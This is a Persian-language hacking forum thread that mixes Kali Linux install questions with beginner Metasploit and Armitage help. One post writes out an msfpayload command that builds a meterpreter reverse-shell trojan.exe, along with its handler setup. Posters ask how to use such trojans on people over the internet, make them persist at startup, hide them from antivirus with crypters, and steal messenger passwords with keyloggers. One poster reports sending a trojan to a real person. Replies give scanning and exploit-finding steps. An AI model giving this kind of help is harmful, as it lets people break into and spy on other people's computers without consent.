از بالا بیاییم پایین
اینجا یه اشکالی داره شما اول باید پیلود رو انتخاب کنی و بعد آپشن های اونو ست کنی مثل lhost & lport


نمیدونم ولی همینجوریم کار کرد!



شما در این حالت پشت nat هستی یا باید آی پی ولید بگیری یا از vps استفاده کنی.


ببخشید اینجا درست نفهمیدم، آی پی ولید یعنی همونی که تو whatismyipه یا باید برم NO-IP؟



چرا می تونی هر فایلی که خواستی آپلود کنی دیگه اون بسته به خودت


ن دوستم منزورم این بود که نمیخام اول لیسن کنم بعدش طرف اجرا کنه....میخام هر موقه که اجرا شده بود من بتونم نفوذ کنم حتی اگه لیسن کردم بعد اجرای فایل باشه!



یه اروری میده، میگه: Program too big to fit in memory چیکار کنم؟


تشکر مارشال جون!

leoehsan
01-18-2015, 06:12 PM
اقا تورو قران یکی درست حسابی بگه کالی لینوکس رو چه مدلی رو فلش بوتش کنم بد از طریق فلش
کالی روکنار ویندوز سون نصب کنم..به خدا 1ماهه الافم.هر راحی بوده رفتم اما نشد
راه های که رفتم

1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار UNetbootin.6.08
لینک عکسش [Only registered and activated users can see links]
4.بوتش روفلش 6.80گیگ فضا میگیره
5.اماوقتی سیستم روریست میکنم بافلش میام بالا کلن کالی روفلش میاد بالا واسه استفاده
لینک عکسش [Only registered and activated users can see links]
6.هیچ گزینه ای برای نصب ازطریق فلش کنار ویندوز نیست
دقیقن راهی رو رفتم که تو فایل پی دی افش به زبان اصلی بود
اما مرحله اخر که غولشه طبق پی دی افش باید این عکس بیاد [Only registered and activated users can see links]
اما عکس بالا جاش میاد جالبه واسه خودم قضیه چیه..........
================================================== =========
راه دوم
1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار LinuxLive USB Creator
عکس نرم افزار [Only registered and activated users can see links]
4.جالبه وقتی بوت میکنه فقط 2.98 گیگ از فضا فلشو میگیره برعکس مرحله قبل که 6.80 گیگ میگرفت
5. اما مرحله اخر که طبق پی دی افش این عکس میاد [Only registered and activated users can see links]
-----------------------------------------------------------
فرقش این 2راه چیه ...

XoDiAK
01-18-2015, 06:56 PM
اقا تورو قران یکی درست حسابی بگه کالی لینوکس رو چه مدلی رو فلش بوتش کنم بد از طریق فلش
کالی روکنار ویندوز سون نصب کنم..به خدا 1ماهه الافم.هر راحی بوده رفتم اما نشد
راه های که رفتم

1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار UNetbootin.6.08
لینک عکسش [Only registered and activated users can see links]
4.بوتش روفلش 6.80گیگ فضا میگیره
5.اماوقتی سیستم روریست میکنم بافلش میام بالا کلن کالی روفلش میاد بالا واسه استفاده
لیSنک عکسش [Only registered and activated users can see links]
6.هیچ گزینه ای برای نصب ازطریق فلش کنار ویندوز نیست
دقیقن راهی رو رفتم که تو فایل پی دی افش به زبان اصلی بود
اما مرحله اخر که غولشه طبق پی دی افش باید این عکس بیاد [Only registered and activated users can see links]
اما عکس بالا جاش میاد جالبه واسه خودم قضیه چیه..........
================================================== =========
راه دوم
1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار LinuxLive USB Creator
عکس نرم افزار [Only registered and activated users can see links]
4.جالبه وقتی بوت میکنه فقط 2.98 گیگ از فضا فلشو میگیره برعکس مرحله قبل که 6.80 گیگ میگرفت
5. اما مرحله اخر که طبق پی دی افش این عکس میاد [Only registered and activated users can see links]
-----------------------------------------------------------
فرقش این 2راه چیه ...

سلام چرا اسپم میدید؟؟؟

سرچ کنید لطفا بفرمایید :

[Only registered and activated users can see links] d.php%3F104177-%25D8%25A2%25D9%2585%25D9%2588%25D8%25B2%25D8%25B4-%25D8%25AC%25D8%25A7%25D9%2585%25D8%25B9-%25D9%2586%25D8%25B5%25D8%25A8-%25D8%25AA%25D9%2588%25D8%25B2%25DB%258C%25D8%25B9-%25D9%2587%25D8%25A7%25DB%258C-%25D9%2584%25DB%258C%25D9%2586%25D9%2588%25DA%25A9 %25D8%25B3%25DB%258C-%25D8%25AF%25D8%25B1-%25DA%25A9%25D9%2586%25D8%25A7%25D8%25B1-%25D9%2588%25DB%258C%25D9%2586%25D8%25AF%25D9%2588 %25D8%25B2&ei=MNC7VIqsNI7-aOLLgMgF&usg=AFQjCNEYWVy-f6tA25SPtorl_gCQSse6rA&sig2=vyWyqIM7mbb4-gbCB01Tmg&bvm=bv.83829542,d.d2s

Muts
01-18-2015, 08:00 PM
سلام دوستان
امیدوارم حالتون خوب باشه!

به این صورت انجام دادم:


1.msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.x.y LPORT=6666 x> ~/Desktop/trojan.exe که آی پی رو از ifconfig گرفتم و زدم و پورتو هویجوری عشقی!

2.
use exploit/multi/handler
set LHOST 192.168.x.y
set LPORT 6666
set payload windows/meterpreter/reverse_tcp
exploit

3.رفتم تو ویندوز تروجان رو اجرا کردم و اجرا شد تا اینجا هیچ مشکلی نیس حتی شلم گرفتم!



سوال و مشکل:


1.واسه نفوذ به شخص دیگه در اینترنت، تو مورد اول واسه LHOST باید آی پی لوکال رو بزنم یا آی پی ای که تو whatismyip نشون میده؟ اگه لوکال، واسه ویندوز رو بزنم یا واسه بک ترکی که با vmware اجرا شده؟

2.واسه همین مورد اول باید از آی پی خودم استفاده بشه یا از NO-IP یعنی آدرس مثلا mydns.no-ip.com رو بهش بدم یا آی پی خودمو؟

3.درباره پورت اینکه حتما باید پورت فوروارد کنم؟ و اگه آره دوباره باید بپرسم که باید تو اون قسمت Server IP address آی پی لوکال، یونیورسال یا NO-IP رو وارد کنم؟

4.واسه شماره 2 اگه باید آدرس NO-IP رو بدیم، پس آی پی خودمون چی میشه یا بهتره بگم اصلن لزوم درست کردن اکانت تو NO-IP چیه وختی خودمون آی پی داریم؟ ممنون میشم موارد 2 و 3 رو کامل توضیح بدین که بدونم دقیقا داره چه اتفاقی می افته؟

5.یه مشکل دیگه ام وجود داره و اون اینه که باید حتمن قبلش بزنی exploit بعد طرف اجرا کنه تا به نتیجه برسی، نمیشه یه کاری کرد که هرموقه اون برنامه اجرا شد و هرموقه ما exploit زدیم نتیجه بده مثلن اون فایل رو بزاریم تو startup ویندوز هربار بتونیم به طرف نفوذ کنیم؟

6.وختی میشه از msfencode استفاده کرد، چرا کریپتر؟ راسی بعد از اینکود شدن به این روش یه اروری میده، میگه: Program too big to fit in memory چیکار کنم؟

7.و یه سوال کلی دیگه اینکه: این کیلاگرا از کجا میفهمن که باید از فلان برنامه یوزر و پسشو بفرستن به اونجایی که ما میخایم؟ یعنی مثلا این همه برنامه هست، نیمباز، یاهو و... این برنامه ها از کجا میفهمن که باید از کدوم برنامه بفرستن به ما؟ و چجوری میشه تعیینش کرد؟

8.یه بار یه تروجان فرستادم طرف که ویندوز 8 داشت، اونی که کریپت شده بود ارور میداد میگفت نمیدونم چی چی با آیکون sa یا smart assembly که ویندوز نمیتونه فایلای این شکلیو باز کنه و اونیم که کریپت نشده بود آنتی ویروس گیر میداد گفتم خب دیزیبلش کن گفت باشه اما بازم هیچ اتفاقی نیافتاد!
-----
واقعا معذرت میخام، خیلی طولانی شد!
واقعا لطف میکنین اگه جواب بدین خیلی تو کفم!
خدا نگهدارتون باشه همیشه!

سلام
برای پیاده سازی در شرایط واقعی باید آی پی ولید داشت! ببینید ای پی ولید دارید یا نه!
(که بسته به شرایط از Port Forwarding یا مود Bridge استفاده کنید)
برای سوال در مورد کی لاگر ها هم تاپیک های spoofer عزیز رو مطالعه کنید به جوابتون میرسید
براس سوال شش هم دلیل منطقی سوال شما رو نفهمیدم که چرا قیاسش کردید ،
حجم فایل زیاد شده و ارور داده که حافظه ندارید

Muts
01-18-2015, 08:04 PM
اطلاعاتی کامل در مورد این میخوام که چی لازمه چی نیست آیا وین ۸.۱ یا ۷ رو میتونه هک کنه؟
120734

سوال شما اشتباهه! پیشنهاد میکنم تاپیک های اموزشی رو مطالعه کنید تا درک درستی از اکسپلویت و آسیب پذیری و روشهای نفوذ و... پیدا کنید

Muts
01-18-2015, 08:22 PM
با عرض سلام و وقت بخیر

استادان عزیز , سوالم اینه که ایا راهی هست که بعد از هک شدن روتر به کلاینت ها نفوذ و سیستمشون هم هک کرد و دسترسی داشت ؟ (metasploit - arm)

اگر امکانش هست منو راهنمایی بفرمایید
با تشکر.
سلام
به صورت خلاقانه از چند تا روش استفاده و پیاده سازی کنید(بعضا داخل فروم مطالبش هست) ،به هدفتون میرسید : - )


سلام../
من بالاخره نفهمیدم که چطور میتونم با اینترنت gprs کلاینت هک کنم...!!
یا اینکه چه محدودیت هایی داره!!
یا ....
یکی هست بتونه درس و کامل جواب بده!هر جا که فکر بکنید در این مورد گشتم ولی هنوز به جوابی نرسیدم..
چون مطالب رو به طور کامل مطالعه نمیکنید !
چند تا صفحه اخیر همین تاپیک رو بگردید شرایط توضیح داده شده !

Muts
01-18-2015, 08:31 PM
من آی پی یه سیستم رو دارم، حالا باید یه پورت باز به آرمیتیج تو کالی بدم، ترجیحا چی باید باشه و اون پورتو چطوری باز کنیم؟
تنها با داشتن ip نمیشه کاری کرد ، اون ای پی ولیده ؟ نیست ؟ و بسته به شرایط از هدف اطلاعات جمع اوری کنید
و اینکه کلا فکرمیکنم برداشت شما از نحوه کار متاسپلویت و ارمیتیج برداشت غلطیه ، تاپیک های همین بخش رو مطالعه کنید

نگاه کنید هر سرویس خاصی که شما استفاده کنید پورت مخصوصش باز میشه
شما باید سیب پذیری اون سرویس رو پچ کنید
منظور ایشون بچ فایله مثلا برای باز کردن پورت ! که کلا به نظرم از پایه اشتباهه این نوع سناریو چیدن !

BBESTBOYY
01-18-2015, 08:34 PM
دوست من
من نمیتونم تعریف اکسپلویت رو درک کنم (شاید هم بکنم نمیدونم!)
من از شما دوست عزیز خواهشمندم که من رو راهنمایی کنید تا درک درستی بدست بیارم
با عرض معذرت فقط شوتم نکنید به تاپیک های دیگه!!(ممنون میشم)
---------------------
اون درکی که من از اکسپلویت دارم: کدهای مخرب که هکر نوشته تا اون حفره امنیتی (باگ) رو اثبات کنه و ما از اون حفره برای هک استفاده کنیم (به عبارتی باگ رو به نام خودش بزنه)
-------------
میخوام بدونم کجای سوالم میلنگه؟
-------
لطفا شما جواب بدید نه دوستان دیگه ممنونم (Predator)

Muts
01-18-2015, 08:37 PM
اقا تورو قران یکی درست حسابی بگه کالی لینوکس رو چه مدلی رو فلش بوتش کنم بد از طریق فلش
کالی روکنار ویندوز سون نصب کنم..به خدا 1ماهه الافم.هر راحی بوده رفتم اما نشد
راه های که رفتم

1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار UNetbootin.6.08
لینک عکسش [Only registered and activated users can see links]
4.بوتش روفلش 6.80گیگ فضا میگیره
5.اماوقتی سیستم روریست میکنم بافلش میام بالا کلن کالی روفلش میاد بالا واسه استفاده
لینک عکسش [Only registered and activated users can see links]
6.هیچ گزینه ای برای نصب ازطریق فلش کنار ویندوز نیست
دقیقن راهی رو رفتم که تو فایل پی دی افش به زبان اصلی بود
اما مرحله اخر که غولشه طبق پی دی افش باید این عکس بیاد [Only registered and activated users can see links]
اما عکس بالا جاش میاد جالبه واسه خودم قضیه چیه..........
================================================== =========
راه دوم
1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار LinuxLive USB Creator
عکس نرم افزار [Only registered and activated users can see links]
4.جالبه وقتی بوت میکنه فقط 2.98 گیگ از فضا فلشو میگیره برعکس مرحله قبل که 6.80 گیگ میگرفت
5. اما مرحله اخر که طبق پی دی افش این عکس میاد [Only registered and activated users can see links]
-----------------------------------------------------------
فرقش این 2راه چیه ...
سلام
شما چرا کارتون رو سخت میکنید ؟
یه vmware دانلود کنید و بدون دغدغه ازدست دادن هارد یا مشکلات دیگه اون رو نصب کنید
(عکس ها رو نتونستم بازکنم ،مشکل حل نشد بهم پیغام خصوصی بدید)
سوالها رو هم در بخش مناسبش بپرسید ، زودتر راهنمایی میشید

marshal3333
01-18-2015, 10:22 PM
اقا تورو قران یکی درست حسابی بگه کالی لینوکس رو چه مدلی رو فلش بوتش کنم بد از طریق فلش
کالی روکنار ویندوز سون نصب کنم..به خدا 1ماهه الافم.هر راحی بوده رفتم اما نشد
راه های که رفتم

1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار UNetbootin.6.08
لینک عکسش [Only registered and activated users can see links]
4.بوتش روفلش 6.80گیگ فضا میگیره
5.اماوقتی سیستم روریست میکنم بافلش میام بالا کلن کالی روفلش میاد بالا واسه استفاده
لینک عکسش [Only registered and activated users can see links]
6.هیچ گزینه ای برای نصب ازطریق فلش کنار ویندوز نیست
دقیقن راهی رو رفتم که تو فایل پی دی افش به زبان اصلی بود
اما مرحله اخر که غولشه طبق پی دی افش باید این عکس بیاد [Only registered and activated users can see links]
اما عکس بالا جاش میاد جالبه واسه خودم قضیه چیه..........
================================================== =========
راه دوم
1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار LinuxLive USB Creator
عکس نرم افزار [Only registered and activated users can see links]
4.جالبه وقتی بوت میکنه فقط 2.98 گیگ از فضا فلشو میگیره برعکس مرحله قبل که 6.80 گیگ میگرفت
5. اما مرحله اخر که طبق پی دی افش این عکس میاد [Only registered and activated users can see links]
-----------------------------------------------------------
فرقش این 2راه چیه ...

داش فکر نکنم از رو فلش بتونی رو سیستمیت نصب کنی
وقتی رو فلش نصب می کنی فقط می تونی به صورت لایو ازش استفاده کنی

marshal3333
01-18-2015, 10:40 PM
دوست من
من نمیتونم تعریف اکسپلویت رو درک کنم (شاید هم بکنم نمیدونم!)
من از شما دوست عزیز خواهشمندم که من رو راهنمایی کنید تا درک درستی بدست بیارم
با عرض معذرت فقط شوتم نکنید به تاپیک های دیگه!!(ممنون میشم)
---------------------
اون درکی که من از اکسپلویت دارم: کدهای مخرب که هکر نوشته تا اون حفره امنیتی (باگ) رو اثبات کنه و ما از اون حفره برای هک استفاده کنیم (به عبارتی باگ رو به نام خودش بزنه)
-------------
میخوام بدونم کجای سوالم میلنگه؟
-------
لطفا شما جواب بدید نه دوستان دیگه ممنونم (Predator)

خوب کد مخرب بودنش که درسته
ما دو نوع اکسپلویت داریم لوکال و ریموت
هر دو تقریبا یکی هستن اما لوکال برای سیستمی که دسترسی داریم ازش و برای بالا بردن سطح دسترسی استفاده میشه ازش اما تو ریموت به کمک اون اکسپلویت اکسس میگیریم تازه
یه اکسپلویت هم هست که برای وب اپلیکشن استفاده میشه که اون کد نیست فقط توضیح میده که فلان cms یا برنامه وب فلان کدش آسیب پذیره

pooya2ir
01-18-2015, 11:04 PM
سلام
به صورت خلاقانه از چند تا روش استفاده و پیاده سازی کنید(بعضا داخل فروم مطالبش هست) ،به هدفتون میرسید : - )



میشه خواهش کنم یکم واضح تر توضیح بدید و لینک در اختیارم بزارید تا مطالعه کنم؟

سپاس

kashefylord1991
01-19-2015, 01:58 AM
سلام



چون مطالب رو به طور کامل مطالعه نمیکنید !
چند تا صفحه اخیر همین تاپیک رو بگردید شرایط توضیح داده شده !

اقا بیزحمت ادرسش رو قرار بدید واگر مکانش هست همینجا یه کوچولو توضیح بدید که چطور با اینترنت gprs میتونم از متا استفاده کنم..ودر صورت امکان مثالی هم بزنید..بخدا زیاد گشتم ولیهنوز به جواب نرسیدم!!!!
ممنون

salisali
01-19-2015, 01:04 PM
سلام
برای پیاده سازی در شرایط واقعی باید آی پی ولید داشت! ببینید ای پی ولید دارید یا نه!
(که بسته به شرایط از Port Forwarding یا مود Bridge استفاده کنید)
برای سوال در مورد کی لاگر ها هم تاپیک های spoofer عزیز رو مطالعه کنید به جوابتون میرسید
براس سوال شش هم دلیل منطقی سوال شما رو نفهمیدم که چرا قیاسش کردید ،
حجم فایل زیاد شده و ارور داده که حافظه ندارید

شرمندتم! من مبتدی ام! از کجا میشه بدونم آی پی ولیده یا ن؟ اگه آی پی استاتیک بودن ملاکه باید بگم ن نیست! اما بغیر از این فکر میکردم با NO-IP میشه همچین کاری کرد که ما آدرس NO-IP خودمونو بدیم بعدش که طرف اون فایل رو اجرا کرد بره به NO-IP بعد بیاد بغل خودمون!

مقایسم واس این خاطر بود که میخاستم از شر آنتی ویروسا خلاص شم که از هر دو روش استفاده کردم!:)

اگر چه حافظه پر شده اما فککنم سون اینجوریه چون عین همین شرایط تو 8 یا xp جواب میده!

مرسی شکارچی عزیز!

hichkas1
01-19-2015, 09:20 PM
سلام
وقتی در متااسپلویت تارگتی رو اسکن میکنیم find attack
یه سری مواردی میاره که مربوط به سرویس های روی تارگتمون هست مثل : FTP -HTTPو .... که یعنی این باگ هارو داره
ولی هیچ وقت جواب نداده دلیلش چیه؟

XoDiAK
01-19-2015, 09:38 PM
سلام
وقتی در متااسپلویت تارگتی رو اسکن میکنیم find attack
یه سری مواردی میاره که مربوط به سرویس های روی تارگتمون هست مثل : FTP -HTTPو .... که یعنی این باگ هارو داره
ولی هیچ وقت جواب نداده دلیلش چیه؟

سلام وقتی شما find attack رو میزنید بسته پورت های پیدا شده ارمیتج اکسپلویت مربوط به پورت رو لود میکنه :)

و به معنی این نیست که تارگت اسیب پذیر هست :) یا حق

A-T44
01-19-2015, 10:44 PM
تنها با داشتن ip نمیشه کاری کرد ، اون ای پی ولیده ؟ نیست ؟ و بسته به شرایط از هدف اطلاعات جمع اوری کنید
و اینکه کلا فکرمیکنم برداشت شما از نحوه کار متاسپلویت و ارمیتیج برداشت غلطیه ، تاپیک های همین بخش رو مطالعه کنید

منظور ایشون بچ فایله مثلا برای باز کردن پورت ! که کلا به نظرم از پایه اشتباهه این نوع سناریو چیدن !

امکانش هست کلا من میخوام کلاینت هکینگ رو یاد بگیرم، اما خیلی سریع. مقدماتو میخونم بعدا. حالا شما چی پیشنهاد میکنین؟ پست های کلاینت هکینگ درست و حسابی چی میشناسین؟

XoDiAK
01-19-2015, 11:26 PM
امکانش هست کلا من میخوام کلاینت هکینگ رو یاد بگیرم، اما خیلی سریع. مقدماتو میخونم بعدا. حالا شما چی پیشنهاد میکنین؟ پست های کلاینت هکینگ درست و حسابی چی میشناسین؟

سلام برای کلاینت هکینگ میتونید به این بخش ها مراجعه کنید (سرچ نزدی ها :) )

[Only registered and activated users can see links]

[Only registered and activated users can see links]

[Only registered and activated users can see links] 5%91%E2%96%8C%E2%95%91%D9%87%DA%A9%D8%B1-%D9%87%D8%A7%DB%8C-%D8%AA%D8%A7%D8%B2%D9%87-%D9%88%D8%A7%D8%B1%D8%AF-%D8%A8%D8%AE%D8%B4-%D9%88%DB%8C%D8%B1%D9%88%D8%B3-%D9%87%D8%A7-%D9%88-%D8%AA%D8%B1%D9%88%D8%AC%D8%A7%D9%86-%D9%87%D8%A7-%E2%96%8C%E2%94%82%E2%96%88%E2%95%91%E2%96%8C%E2%9 5%91%E2%96%8C%E2%95%91

hichkas1
01-19-2015, 11:51 PM
سلام وقتی شما find attack رو میزنید بسته پورت های پیدا شده ارمیتج اکسپلویت مربوط به پورت رو لود میکنه :)

و به معنی این نیست که تارگت اسیب پذیر هست :) یا حق


برای اینکه بتونیم بفهمیم با توجه به پورت ها و نرم افزارهای اجرا شده پشت ان مثلا proftpd و...
چطور میتونیم xpl هایی که براش اومده در metasploit امتحان کنیم؟ چون متوجه هستم به صورت شماره هستند مثلا ms120-11
مرجعی چیزی هست؟

pooya2ir
01-20-2015, 12:56 AM
چطوری میتونیم بفهمیم سیستم طرف چه باگی داره چه ویندوزی داره تا بهش از طریق metasploit و پورت باز نفوذ کنیم ؟

اگه تمامی پورتهای طرف بسته یا فیلتر بود راه حل چیه ؟

ممنون

marshal3333
01-20-2015, 01:08 AM
متد زیاده

همیشه که قرار نیست از روی پورت ها و سرویس اونا کاری کرد.
میتونی از متدایی مثل افزونه های فایرفکس یا autopwn یا java applet یا بک دور های متاسپلویت هم استفاده کنی

marshal3333
01-20-2015, 01:13 AM
برای اینکه بتونیم بفهمیم با توجه به پورت ها و نرم افزارهای اجرا شده پشت ان مثلا proftpd و...
چطور میتونیم xpl هایی که براش اومده در metasploit امتحان کنیم؟ چون متوجه هستم به صورت شماره هستند مثلا ms120-11
مرجعی چیزی هست؟

شمام اول با nmap با دستور

nmap -sV IpAddress
می تونی اول ورژن تون سرویس دهنده رو پیدا کنی بعد تو سایت خود متاسپلویت یا exploit-db بگردی ببینی اکسپلویت شده اصلا یا اگه شده اکسپلویتش پابلیک بعدم می تونی به متا اضافه کنی و استفاده کنی

pooya2ir
01-20-2015, 01:33 AM
من که کلا گیج شدم

همه ی اموزش های داخل سایت فقط با پورت 443 و xp test بوده

بعد 2 روز هیچی از metasploit armitag و نحوه کار حرفه ای نفهمیدم ..

leoehsan
01-20-2015, 12:28 PM
اقا تورو قران یکی درست حسابی بگه کالی لینوکس رو چه مدلی رو فلش بوتش کنم بد از طریق فلش
کالی روکنار ویندوز سون نصب کنم..به خدا 1ماهه الافم.هر راحی بوده رفتم اما نشد
راه های که رفتم

1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار UNetbootin.6.08
لینک عکسش [Only registered and activated users can see links]
4.بوتش روفلش 6.80گیگ فضا میگیره
5.اماوقتی سیستم روریست میکنم بافلش میام بالا کلن کالی روفلش میاد بالا واسه استفاده
لینک عکسش [Only registered and activated users can see links]
6.هیچ گزینه ای برای نصب ازطریق فلش کنار ویندوز نیست
دقیقن راهی رو رفتم که تو فایل پی دی افش به زبان اصلی بود
اما مرحله اخر که غولشه طبق پی دی افش باید این عکس بیاد [Only registered and activated users can see links]
اما عکس بالا جاش میاد جالبه واسه خودم قضیه چیه..........
وهیچ گزینه ای برای نصب بر روی هارد نمیاد طبق بی دی افش که با عکس نشون داده
================================================== =========
راه دوم
1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار LinuxLive USB Creator
عکس نرم افزار [Only registered and activated users can see links]
4.جالبه وقتی بوت میکنه فقط 2.98 گیگ از فضا فلشو میگیره برعکس مرحله قبل که 6.80 گیگ میگرفت
5. اما مرحله اخر که طبق پی دی افش این عکس میاد [Only registered and activated users can see links]
گزینه نصب میادش و طبف پی دی افش وقتی گزینه
gherapycal install
رو میزنم تو مرحله
detect network
گیر میکنه
3ماهه هیچکس جواب درس نمیده...90 روزه الافه اینم...اینم از انجمنتون
-----------------------------------------------------------
اونایی که بلد نیستن بکترک رو نصب کنن بهتره یکی از این راهارو برن
فرقشون چیه ؟؟ ممنونم

r00tErr0r
01-20-2015, 12:53 PM
اقا تورو قران یکی درست حسابی بگه کالی لینوکس رو چه مدلی رو فلش بوتش کنم بد از طریق فلش
کالی روکنار ویندوز سون نصب کنم..به خدا 1ماهه الافم.هر راحی بوده رفتم اما نشد
راه های که رفتم

1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار UNetbootin.6.08
لینک عکسش [Only registered and activated users can see links]
4.بوتش روفلش 6.80گیگ فضا میگیره
5.اماوقتی سیستم روریست میکنم بافلش میام بالا کلن کالی روفلش میاد بالا واسه استفاده
لینک عکسش [Only registered and activated users can see links]
6.هیچ گزینه ای برای نصب ازطریق فلش کنار ویندوز نیست
دقیقن راهی رو رفتم که تو فایل پی دی افش به زبان اصلی بود
اما مرحله اخر که غولشه طبق پی دی افش باید این عکس بیاد [Only registered and activated users can see links]
اما عکس بالا جاش میاد جالبه واسه خودم قضیه چیه..........
وهیچ گزینه ای برای نصب بر روی هارد نمیاد طبق بی دی افش که با عکس نشون داده
================================================== =========
راه دوم
1.دانلود نسخه کالی لینوکس فایل ایزوش
2.اماده کردن فلش 8گیگ وفرمت ان به fat32
3.استفاده از نرم افزار LinuxLive USB Creator
عکس نرم افزار [Only registered and activated users can see links]
4.جالبه وقتی بوت میکنه فقط 2.98 گیگ از فضا فلشو میگیره برعکس مرحله قبل که 6.80 گیگ میگرفت
5. اما مرحله اخر که طبق پی دی افش این عکس میاد [Only registered and activated users can see links]
گزینه نصب میادش و طبف پی دی افش وقتی گزینه
gherapycal install
رو میزنم تو مرحله
detect network
گیر میکنه
3ماهه هیچکس جواب درس نمیده...90 روزه الافه اینم...اینم از انجمنتون
-----------------------------------------------------------
اونایی که بلد نیستن بکترک رو نصب کنن بهتره یکی از این راهارو برن
فرقشون چیه ؟؟ ممنونم


هر جا تونستی این پست دادی ها ، کسیم رسیدگی نمیکنه ،
داداش گلم شما همون دفعه اولی که این پستو زدی اگه کسی بود راهنماییت میکرد .

فایل ایزوش وقتی از طریق wmvare بالا میارید اخرش یه گزینه نصب از طریق بودت دارهاز اونجا میتونید رو وی ام ویر نصب کنید ، اگه میخواید کنار ویندوز داشته باشید ، حتمی نباید رو فلش بوتش کنید یا رو سی دی ... .

من خودم فایل ایزوشو از سایت خودش دانلود کردم و از طریق بوت رو وی ام ویر نصب کردم ، شما فیلم آموزشی نحوه نصبش که تو انجمن هستو ببین اونم میتونه خیلی کمکت کنه

Muts
01-20-2015, 01:08 PM
دوست من
من نمیتونم تعریف اکسپلویت رو درک کنم (شاید هم بکنم نمیدونم!)
من از شما دوست عزیز خواهشمندم که من رو راهنمایی کنید تا درک درستی بدست بیارم
با عرض معذرت فقط شوتم نکنید به تاپیک های دیگه!!(ممنون میشم)
---------------------
اون درکی که من از اکسپلویت دارم: کدهای مخرب که هکر نوشته تا اون حفره امنیتی (باگ) رو اثبات کنه و ما از اون حفره برای هک استفاده کنیم (به عبارتی باگ رو به نام خودش بزنه)
-------------
میخوام بدونم کجای سوالم میلنگه؟
-------
لطفا شما جواب بدید نه دوستان دیگه ممنونم (predator)

تعریف شما خوبه ، اما شرایط تست هم مهمه! ممکنه اصلا پیش نیازی که روی سیستم قربانی باشه نباشه!
فایروالی اکسپلویت رو بسته باشه و...
شما میگید میشه هک کرد؟ در کدوم شرایط؟ واقعی ؟lab ؟ (شروع به تست در شرایط ازمایشگاهی کنید!)
شما همون توضیحات بالای عکسی که دادید رو مطالعه کنید
من فکرمیکنم صرفا با دستورات زدن در محیط متاسپلویت همیشه به بن بست خواهید خورد ،اما با کار و بررسی و تحلیل قضیه فرق میکنه.
شما توضیحات مربوط به اون اکسپلویت رو بخونید،ببینید از چه نوع آسیب پذیری استفاده میکنه؟چه شرایطی روی سیستم قربانی باید رعایت بشه؟بعد برای شروع، اقدام به تست روی محیط ازمایشگاهی کنید
نتیجه اجرا روی محیط lab شما چی بود؟

Muts
01-20-2015, 02:47 PM
چطوری میتونیم بفهمیم سیستم طرف چه باگی داره چه ویندوزی داره تا بهش از طریق metasploit و پورت باز نفوذ کنیم ؟



ممنون
vulnerability scanner استفاده کنید مثل NeSSus ، Nexpose , وGFI LanGuard و...


اگه تمامی پورتهای طرف بسته یا فیلتر بود راه حل چیه ؟
راه حلش انجام تحلیل سیستم هدف و تست کردنه

Muts
01-20-2015, 02:49 PM
من که کلا گیج شدم

همه ی اموزش های داخل سایت فقط با پورت 443 و xp test بوده

بعد 2 روز هیچی از metasploit armitag و نحوه کار حرفه ای نفهمیدم ..
1- تاپیک اموزشهای پایه ای همین بخش
2- مراجعه به رفرنس اصلی متاسپلویت
و...
موفق باشید

pooya2ir
01-21-2015, 03:42 PM
سلام بر استادان عزیز

لطفا یه vulnerability scanner که به کار بیاد و خوب باشه لینک بزارید

هرچی دانلود کردم بدرد نخور بود جز nessuse که تریالش فقط client local اسکن میکنه

قصد اصلی من اسکن کردن public ip هست .

ممنون.

pooya2ir
01-21-2015, 06:21 PM
فایلهای metasploit با فرمت rb کار میکنن
اما تو exploit-db فرمت های دیگه هست مثل txt , sh , c و...

چطوری میشه این فرمت هارو به لیست metasploit exploit اضافه و استفاده کرد ؟

-------
این ارور رو چیکارش باید کرد ؟

Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

ممنون

ArminCyber
01-21-2015, 07:21 PM
فایلهای metasploit با فرمت rb کار میکنن
اما تو exploit-db فرمت های دیگه هست مثل txt , sh , c و...

چطوری میشه این فرمت هارو به لیست metasploit exploit اضافه و استفاده کرد ؟

-------
این ارور رو چیکارش باید کرد ؟

Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

ممنون

سلام


فایلهای metasploit با فرمت rb کار میکنن
اما تو exploit-db فرمت های دیگه هست مثل txt , sh , c و...

توی سایت هایی ثبت اکسپلویت، اکسپلویت ها به زبان های مختلفی وجود داره،

طبیعی که همش به روبی نوشته نشده باشه.


چطوری میشه این فرمت هارو به لیست metasploit exploit اضافه و استفاده کرد ؟

باید با زبان روبی آشنایی داسته باشید تا بتوانید اکسپلویت ها را به این زبان تبدیل کنید.


Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired

عکس بگذارید...

ali13688
01-26-2015, 06:59 PM
من تونستم یوزر و پسورد وایرلس یک نفر را بدست بیارم. می خواستم بدونم ایا میتونم از طریق همین یوزر و پسورد وارد سیستمش بشم یا نه؟
اگه میشه چطوری؟
منتظر کمک شما دوستان هستم
با تشکر
در ضمن من مبتدی هستم لطفا دوستان ساده توضیح دهند
لطفا خصوصی بفرستین

generalha
01-26-2015, 08:09 PM
